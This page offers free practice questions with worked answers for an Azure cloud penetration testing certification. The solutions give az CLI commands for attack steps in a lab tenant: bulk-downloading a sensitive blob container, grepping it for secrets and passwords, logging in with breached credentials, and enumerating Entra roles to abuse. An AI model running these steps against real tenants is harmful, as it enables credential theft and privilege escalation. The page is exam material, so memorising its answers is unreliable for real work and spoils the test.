Limited-Time Offer: Enjoy 50% Savings! Ends in 00h 00m 00s Coupon code: 50OFF
Skip to content

Free The SecOps Group Certified Cloud Pentesting eXpert - Azure CCPenX-Az Exam Questions

Page: 1 / 6 Total 31 questions

Want more questions? Get Premium Access.

Question 1

SIMULATION

Carefully enumerate the accessible Azure Blob Container to locate a file containing credentials for an App Registration within the tenant. What is the Application/Client ID of the discovered App Registration?

Correct Answer: A. See the Answer in Explanation below
Explanation:

The answer is the clientId, appId, or applicationId value inside the credential file downloaded from the sensitive-files container.

Detailed Solution:

List blobs inside the accessible container:

az storage blob list \

--account-name excaliburstore \

--container-name sensitive-files \

--sas-token '$SAS' \

--query '[].name' \

--output table

Download all files locally:

mkdir blobloot

az storage blob download-batch \

--account-name excaliburstore \

--source sensitive-files \

--destination blobloot \

--sas-token '$SAS'

Search the downloaded files for application credentials:

grep -RniE 'clientId|appId|applicationId|clientSecret|tenantId|secret|password' blobloot

On Windows PowerShell:

Select-String -Path .\blobloot\* -Pattern 'clientId|appId|applicationId|clientSecret|tenantId|secret|password' -CaseSensitive:$false

A typical file may look like this:

{

'tenantId': 'f015f36d-c07f-41fb-9bde-fffc3a22ee8b',

'clientId': '',

'clientSecret': ''

}

The clientId / appId value is the answer.

Final Answer:

Use the clientId / appId value found in the blob credential file.


Question 2

Inside the public blob container, a file named backup-config.json contains service principal credentials. What field contains the App Registration client ID?

Correct Answer: C. clientId
Explanation:

Detailed Solution:

Download the blob:

az storage blob download \

--account-name prodreportstore01 \

--container-name public-backups \

--name backup-config.json \

--file backup-config.json \

--auth-mode login

Read the file:

cat backup-config.json

Expected structure:

{

'tenantId': '8f34c1de-1198-4c2a-b1a8-1eaa72f6e99a',

'clientId': 'c5fba7db-5e61-45bc-8944-3cd457bb19c2',

'clientSecret': 'REDACTED'

}

The App Registration application/client ID is stored in:

clientId


Question 3

SIMULATION

You have been given a breached Azure user credential for an authorized lab tenant:

james.ward@cloudcorpsec.onmicrosoft.com

After logging in, identify the Azure Tenant ID and Subscription ID associated with the account.

Correct Answer: A. See the Answer in Explanation below
Explanation:

Tenant ID: 8f34c1de-1198-4c2a-b1a8-1eaa72f6e99a

Subscription ID: 5d8e44ac-24a9-43d9-9cb5-71b227a58021

Detailed Solution:

Log in with the supplied account:

az login -u james.ward@cloudcorpsec.onmicrosoft.com -p ''

Show the active Azure context:

az account show --output json

Expected relevant output:

{

'id': '5d8e44ac-24a9-43d9-9cb5-71b227a58021',

'name': 'CloudCorp Security Lab',

'tenantDefaultDomain': 'cloudcorpsec.onmicrosoft.com',

'tenantId': '8f34c1de-1198-4c2a-b1a8-1eaa72f6e99a'

}

The tenantId is the Microsoft Entra tenant ID. The id field is the subscription ID.


Question 4

You've uncovered valid credentials for another user in the previous step. Authenticate as this user and investigate their level of access within the Azure environment. Which of the following Microsoft Entra ID roles is assigned to this user?

Correct Answer: B. User Administrator
Explanation:

Detailed Solution:

Log in using the credential recovered in Q4.

az login -u sumit.siddharth@azuresecops.onmicrosoft.com -p '<recovered-password>'

Confirm the current signed-in user:

az ad signed-in-user show --output json

Now enumerate the user's Microsoft Entra ID role memberships through Microsoft Graph.

az rest --method GET \

--url 'https://graph.microsoft.com/v1.0/me/memberOf' \

--output json

To display only role names:

az rest --method GET \

--url 'https://graph.microsoft.com/v1.0/me/memberOf' \

--query 'value[].displayName' \

--output table

The relevant role is:

User Administrator

This role is dangerous because it can manage users and reset passwords for many non-privileged users. That is exactly why the next task asks you to abuse directory-level privileges to compromise another user.

Final Answer:

B . User Administrator


Question 5

SIMULATION

The App Service has a system-assigned managed identity enabled. Identify the managed identity principal ID.

Correct Answer: A. See the Answer in Explanation below
Explanation:

b72a4c19-92f6-47f3-b3dd-9db5a31831d1

Detailed Solution:

Run:

az webapp identity show \

--name finance-reporting-api \

--resource-group rg-prod-apps-eastus \

--output json

Expected output:

{

'principalId': 'b72a4c19-92f6-47f3-b3dd-9db5a31831d1',

'tenantId': '8f34c1de-1198-4c2a-b1a8-1eaa72f6e99a',

'type': 'SystemAssigned'

}

The principalId is the service principal object ID of the managed identity.

Microsoft documents that managed identities provide Azure-managed identities for applications and eliminate the need to manage application secrets directly.


Question 6

SIMULATION

A compromised principal has permission to list role assignments. Identify which user has the User Access Administrator role at the resource group scope.

Correct Answer: A. See the Answer in Explanation below
Explanation:

olivia.admin@cloudcorpsec.onmicrosoft.com

Detailed Solution:

Run:

az role assignment list \

--resource-group rg-prod-apps-eastus \

--all \

--output table

Or filter by role:

az role assignment list \

--resource-group rg-prod-apps-eastus \

--role 'User Access Administrator' \

--query '[].{Principal:principalName,Role:roleDefinitionName,Scope:scope}' \

--output table

Expected output:

Principal Role Scope

------------------------------------- ------------------------- ----------------------------

olivia.admin@cloudcorpsec.onmicrosoft.com User Access Administrator /subscriptions/.../rg-prod-apps-eastus

Final answer:

olivia.admin@cloudcorpsec.onmicrosoft.com